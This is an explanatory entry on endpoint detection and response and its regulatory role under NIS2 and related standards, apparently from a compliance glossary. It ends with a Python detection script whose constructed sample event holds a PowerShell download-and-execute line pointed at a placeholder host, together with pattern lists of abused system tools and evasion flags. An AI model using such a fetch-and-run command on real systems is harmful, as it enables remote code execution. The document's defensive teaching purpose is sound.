Endpoint detection and response
Endpoint detection and response (EDR) is a security technology that continuously records activity on endpoints such as laptops and servers, detects threats, and enables automated or manual responses.
Endpoint detection and response (EDR) refers to a class of security solutions that continuously monitor the behaviour of endpoints, such as notebooks, workstations, servers, and mobile devices, record security-relevant events, and respond to detected threats. Unlike traditional signature-based antivirus software, EDR relies on behavioural analysis, telemetry data, and correlation in order to detect previously unseen attacks, fileless malware, and living-off-the-land techniques, in which attackers abuse legitimate built-in tools such as PowerShell or WMI instead of dropping their own binaries. An EDR agent installed on the endpoint continuously collects data on process creation, network connections, registry changes, and file operations and sends it to a central analysis platform, where detection rules and analytics evaluate both individual events and sequences of events (for example, which process launched which) across the whole fleet.
The value of EDR lies in combining detection with response. When the system identifies suspicious activity, it can automatically initiate countermeasures, for example isolating an endpoint from the network, terminating malicious processes, or quarantining compromised files; such automatic actions need careful tuning, since a false positive that isolates a production server is itself an outage. At the same time, EDR retains the recorded telemetry so that security teams can reconstruct the course of an attack during incident response, determine the root cause of an incident, and proactively search the same data for intrusions that no rule has flagged yet (threat hunting). Coverage is limited to systems on which an agent can run; unmanaged devices, network appliances, and many OT components remain blind spots. EDR is therefore a central building block of modern detection and response capabilities and is often combined with network detection or a SIEM into an overarching XDR strategy.
From a compliance perspective, EDR contributes significantly to meeting regulatory requirements for the detection of and response to security incidents. The NIS2 Directive and German IT security law require affected entities to implement appropriate technical measures for handling security incidents and to report significant incidents within fixed deadlines (under Art. 23 NIS2, an early warning within 24 hours and an incident notification within 72 hours of becoming aware of the incident). The BSI IT-Grundschutz framework and ISO/IEC 27001 likewise require procedures for detection, logging, and response. EDR provides the technical foundation needed to notice incidents in time at all, to meet statutory reporting deadlines, and to demonstrate the effectiveness of security measures to auditors.
Legal Basis
Art. 21(2)(b) NIS2 Directive (EU) 2022/2555; BSI IT-Grundschutz module DER.1 (Detection of security-relevant events); ISO/IEC 27001 Annex A 8.16 (Monitoring activities)
Practical Example
A mid-sized mechanical engineering company qualifies as an important entity under the NIS2 Directive. The information security officer rolls out an EDR solution across all workstations and servers. When an employee opens a malicious email attachment, the EDR agent detects suspicious PowerShell behaviour, automatically isolates the affected notebook from the network, and alerts the security team. Using the recorded telemetry, the team reconstructs the attack path within a few hours, finds no evidence that data was exfiltrated, and documents the incident together with the response in time for the notification to the competent authority.
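As an added illustration of the detection logic described above (not code from this page or from any EDR product), the following Python script runs a behavioural rule over constructed, Sysmon-style process-creation events. It models the practical example: Outlook opens an attachment in Word, Word spawns PowerShell with a hidden, encoded command, and an unrelated administrator launches a backup script. The rule scores each launch of a living-off-the-land binary by its parent process and command-line switches, decodes the `-EncodedCommand` argument (base64 of UTF-16LE text), and reconstructs the process ancestry that an analyst would use to trace the attack path. The sample events, the scoring weights, the flag list, and the response actions are all assumptions made for this example.

```python
import base64
import re

# --- Constructed sample telemetry (Sysmon-style process-creation events), not real data ---
# The chain models the practical example: Outlook -> Word opens the attachment -> Word spawns
# PowerShell with an encoded command. The payload and its encoding are constructed here.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()  # the form -EncodedCommand expects

SAMPLE_EVENTS = [
    {"pid": 400,  "ppid": 1,    "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 812,  "ppid": 400,  "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": "OUTLOOK.EXE"},
    {"pid": 1340, "ppid": 812,  "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'WINWORD.EXE /n "C:\Users\jdoe\AppData\Local\Temp\invoice.docm"'},
    {"pid": 2210, "ppid": 1340, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + ENCODED},
    # benign: an administrator runs a backup script from Explorer; no Office parent, no evasion flags
    {"pid": 2300, "ppid": 400,  "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

# Assumed rule content: Office parents, living-off-the-land binaries, and PowerShell switches that are
# common in malicious launchers and rare in administrative use.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
EVASION_FLAGS = re.compile(r"(?i)-(?:nop(?:rofile)?\b|w(?:indowstyle)?\s+hidden|e(?:nc|ncodedcommand)?\b"
                           r"|e(?:xecutionpolicy|p)\s+bypass|noni(?:nteractive)?\b)")
ENCODED_ARG = re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")


def basename(image):
    """Lower-cased file name of an image path, so rules are case- and directory-insensitive."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE text), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def process_chain(by_pid, pid):
    """Follow ppid links upward to reconstruct the ancestry, root first; guards against pid cycles."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def detect(events, threshold=3):
    """Score each LOLBin launch by its parent and command line; return alerts at or above threshold."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        name = basename(ev["image"])
        if name not in LOLBINS:
            continue
        score, reasons = 0, []
        parent = by_pid.get(ev["ppid"])
        if parent and basename(parent["image"]) in OFFICE_PARENTS:
            score += 3  # Office spawning a scripting host is the strongest behavioural signal here
            reasons.append(f"{name} spawned by Office process {basename(parent['image'])}")
        flags = sorted({" ".join(m.group(0).lower().split()) for m in EVASION_FLAGS.finditer(ev["cmdline"])})
        if flags:
            score += len(flags)
            reasons.append("evasion flags: " + ", ".join(flags))
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded:
            score += 2
            reasons.append("decoded -EncodedCommand: " + decoded)
        if score >= threshold:
            chain = process_chain(by_pid, ev["pid"])
            alerts.append({
                "pid": ev["pid"],
                "score": score,
                "reasons": reasons,
                "attack_path": " > ".join(basename(e["image"]) for e in chain),
                # assumed response policy: always stop the process, isolate the host on high scores
                "actions": ["terminate pid %d" % ev["pid"]] + (["isolate host from network"] if score >= 5 else []),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["attack_path"], alert["score"], alert["actions"], sep=" | ")
        for reason in alert["reasons"]:
            print("  -", reason)
```

Only the PowerShell launched from Word is reported; the administrator's backup script shares the same binary but has neither the Office ancestry nor the evasion switches, which is the difference between a behavioural rule and a signature on `powershell.exe`. The reconstructed `attack_path` is the kind of ancestry the security team in the example uses to trace the incident back to the opened attachment.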